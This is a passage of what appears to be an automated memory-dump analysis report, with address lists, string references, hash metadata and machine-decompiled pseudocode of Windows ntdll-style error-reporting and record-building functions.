0x01b5f778
0x01b5f7a9
0x01b5f7a9
0x01b5f754
0x01b5f75a
0x01b5f75d
0x01b5f75f
0x01b5f761
0x01b5f76f
0x01b5f771
0x01b5f771
0x01b5f76f
0x01b5f763
0x00000000
0x01b5f763
0x01b5f77d
0x01b5f7a3
0x01b5f7a5
0x00000000
0x01b5f7a5
0x01b5f77f
0x01b5f782
0x01b5f784
0x01b5f786
0x00000000
0x00000000
0x00000000
0x01b5f788
0x01b5f748
0x01b5f74d
0x01b5f78d
0x01b5f793
0x01b5f7b7
0x01b5f7bc
0x00000000
0x01b5f7bc
0x01b5f798
0x00000000
0x00000000
0x01b5f79d
0x01b5f7b0
0x00000000
0x01b5f7b0
0x01b5f79f
0x00000000
0x01b5f74f
0x01b5f74f
0x00000000
0x01b5f74f

Strings

Actx , xrefs: 01B5F73F

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: a0d77e2fb5bcd8cb02f3f3a433e45f54aa824ef6bd08656353a137cbdb11512c
Instruction ID: 0d1228dc818ac7300b39326c1ee34bfc1dcaf88c2bbe434c1eea2d30d629a593
Opcode Fuzzy Hash: a0d77e2fb5bcd8cb02f3f3a433e45f54aa824ef6bd08656353a137cbdb11512c
Instruction Fuzzy Hash: 4011B2353486028BEBAD4F1DC490736F696EB86664F2546AEED72CB391EBB0C8418340

Uniqueness

Uniqueness Score: -1.00%

Function 01BE8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01BE8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1c10d50);
				E01B8D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01BC5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L01B8DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L01B8DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E01B8D130(_t34, _t39, _t40);
			}

0x01be8df1
0x01be8df1
0x01be8df1
0x01be8df1
0x01be8df1
0x01be8df1
0x01be8df3
0x01be8df8
0x01be8dfd
0x01be8e00
0x01be8e0e
0x01be8e2a
0x01be8e36
0x01be8e38
0x01be8e3c
0x01be8e46
0x01be8e46
0x01be8e36
0x01be8e50
0x01be8e56
0x01be8e59
0x01be8e5c
0x01be8e60
0x01be8e67
0x01be8e6d
0x01be8e73
0x01be8e74
0x01be8eb1
0x01be8ebd

Strings

Critical error detected %lx, xrefs: 01BE8E21

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: b919a01b866ed6f39824c0b9a5d25367173f958fc84869e5ded3efd7176b8bc4
Instruction ID: f8c8fc5e06fedd3cffc3b5708ff73185b3a47da488d500021f95c5ce771e727b
Opcode Fuzzy Hash: b919a01b866ed6f39824c0b9a5d25367173f958fc84869e5ded3efd7176b8bc4
Instruction Fuzzy Hash: 6D113571D54748DADF29EFA9C909B9CBBB0AB14715F2042AEE529AB2D2C3344602CF14

Uniqueness

Uniqueness Score: -1.00%

Function 01BCFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 01BCFF60

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: dbe9f0cef3a60004c5dc85ab9c343abe279c3d8e5ae36943d4f45d5e34181fbf
Instruction ID: 6a603b78d7012992e4750e983163fa4a56655ffc2f80307429e033bae9872903
Opcode Fuzzy Hash: dbe9f0cef3a60004c5dc85ab9c343abe279c3d8e5ae36943d4f45d5e34181fbf
Instruction Fuzzy Hash: D111CE71A51145EFDF2AEB94C848FA87BB2FF18B14F1480D8E108571A1C7389940DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01C05BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01C05BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1c11178);
				E01B8D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01C04C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E01B7D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01C05542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x1c260e8;
								if( *0x1c260e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x1c260e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01B79710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01B76DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E01B7F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E01B7F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E01B7F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E01B7FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E01B7FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E01B7F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E01B7F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01C04CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E01B8D130(_t427, _t494, _t511);
				}
			}

0x01c05ba5
0x01c05baa
0x01c05baf
0x01c05bb4
0x01c05bb6
0x01c05bbc
0x01c05bbe
0x01c05bc4
0x01c05bcd
0x01c05bd3
0x01c05bd6
0x01c05bdc
0x01c05be0
0x01c05be3
0x01c05beb
0x01c05bf2
0x01c05bf8
0x01c05bfe
0x01c05c04
0x01c05c0e
0x01c05c18
0x01c05c1f
0x01c05c25
0x01c05c2a
0x01c05c2c
0x01c05c32
0x01c05c3a
0x01c05c3f
0x01c05c42
0x01c05c48
0x01c05c5b
0x01c05c5b
0x01c05c2c
0x01c05cb7
0x01c05cb9
0x01c05cbf
0x01c05cc2
0x01c05cca
0x01c05ccb
0x01c05ccb
0x01c05cd1
0x01c05cd7
0x01c05cda
0x01c05ce1
0x01c05ce4
0x01c05ce7
0x01c05ced
0x01c05cf3
0x01c05cf9
0x01c05cff
0x01c05d08
0x01c05d0a
0x01c05d0e
0x01c05d10
0x00000000
0x00000000
0x01c05d16
0x01c05d1a
0x00000000
0x00000000
0x01c05d20
0x01c05d22
0x01c05d25
0x01c05d2f
0x01c05d2f
0x01c05d33
0x01c05d3d
0x01c05d49
0x01c05d4b
0x00000000
0x00000000
0x01c05d5a
0x01c05d5d
0x01c05d60
0x00000000
0x00000000
0x01c05d66
0x01c05d69
0x00000000
0x00000000
0x01c05d6f
0x01c05d6f
0x01c05d73
0x01c05d79
0x01c05d7f
0x01c05d86
0x01c05d95
0x01c05d98
0x01c05dba
0x01c05dcb
0x01c05dce
0x01c05dd3
0x01c05dd6
0x01c05dd8
0x01c05de6
0x01c05dec
0x01c05dee
0x01c05df1
0x01c05df3
0x01c0635a
0x01c0635a
0x00000000
0x01c0635a
0x01c05dfe
0x01c05e02
0x01c05e05
0x01c05e07
0x01c05e10
0x01c05e13
0x01c05e1b
0x01c05e1c
0x01c05e21
0x01c05e22
0x01c05e23
0x01c05e25
0x01c05e2a
0x01c05e2c
0x01c05e2e
0x01c05e36
0x01c05e39
0x01c05e42
0x01c05e47
0x01c05e4d
0x01c05e54
0x01c05e54
0x01c05e54
0x01c05e2e
0x01c05e5c
0x01c05e5f
0x01c05e62
0x01c05e64
0x01c05e6b
0x01c05e70
0x01c05e7a
0x01c05e7a
0x01c05e7a
0x01c05e6b
0x01c05e7e
0x01c05e7f
0x01c05e7f
0x01c05e81
0x01c05e87
0x01c05e8b
0x01c05e8c
0x01c05e8c
0x01c05e8c
0x01c05e9a
0x01c05e9c
0x01c05ea2
0x01c05ea6
0x01c05f50
0x01c05f50
0x01c05f57
0x01c05f66
0x01c05f66
0x01c05f66
0x01c05f68
0x01c05f6a
0x01c063d0
0x00000000
0x01c05f70
0x01c05f70
0x01c05f91
0x01c05f9c
0x01c05f9e
0x01c05fa4
0x01c05fa6
0x01c0638c
0x01c06392
0x01c063a1
0x01c063a7
0x01c063af
0x01c063af
0x01c063bd
0x01c063d8
0x00000000
0x01c063d8
0x01c05fac
0x01c05fb2
0x01c05fb4
0x01c05fbd
0x01c05fc6
0x01c05fce
0x01c05fd4
0x01c05fdc
0x01c05fec
0x01c05fed
0x01c05fee
0x01c05fef
0x01c05ff9
0x01c05ffa
0x01c05ffb
0x01c05ffc
0x01c06000
0x01c06004
0x01c06012
0x01c06012
0x01c06018
0x01c06019
0x01c0601a
0x01c0601b
0x01c0601c
0x01c06020
0x01c06059
0x01c0605c
0x01c06061
0x01c06061
0x01c06022
0x01c06022
0x01c06022
0x01c06025
0x01c0602a
0x01c0602b
0x01c06031
0x01c06037
0x01c06038
0x01c0603e
0x01c06048
0x01c06049
0x01c0604a
0x01c0604b
0x01c0604c
0x01c0604d
0x01c06053
0x01c06054
0x01c06054
0x01c06062
0x01c06065
0x01c06067
0x01c0606a
0x01c06070
0x01c06075
0x01c06076
0x01c06081
0x01c06087
0x01c06095
0x01c06099
0x01c0609e
0x01c060a4
0x01c060ae
0x01c060b0
0x01c060b3
0x01c060b6
0x01c060b8
0x01c060ba
0x01c060ba
0x01c060ba
0x01c060ba
0x01c060be
0x01c060c0
0x01c060c5
0x01c060c5
0x01c060c5
0x01c060c6
0x01c060cd
0x01c06114
0x01c060cf
0x01c060cf
0x01c060d4
0x01c060d5
0x01c060da
0x01c060db
0x01c060e1
0x01c060e2
0x01c060e8
0x01c060f8
0x01c060fd
0x01c060fe
0x01c06102
0x01c06104
0x01c06107
0x01c06109
0x01c0610b
0x01c0610b
0x01c0610b
0x01c0610b
0x01c0610f
0x01c0610f
0x01c06117
0x01c0611a
0x01c0611f
0x01c06125
0x01c06134
0x01c06139
0x01c0613f
0x01c06146
0x01c06148
0x01c0614b
0x01c0614d
0x01c0614f
0x01c0614f
0x01c0614f
0x01c0614f
0x01c06153
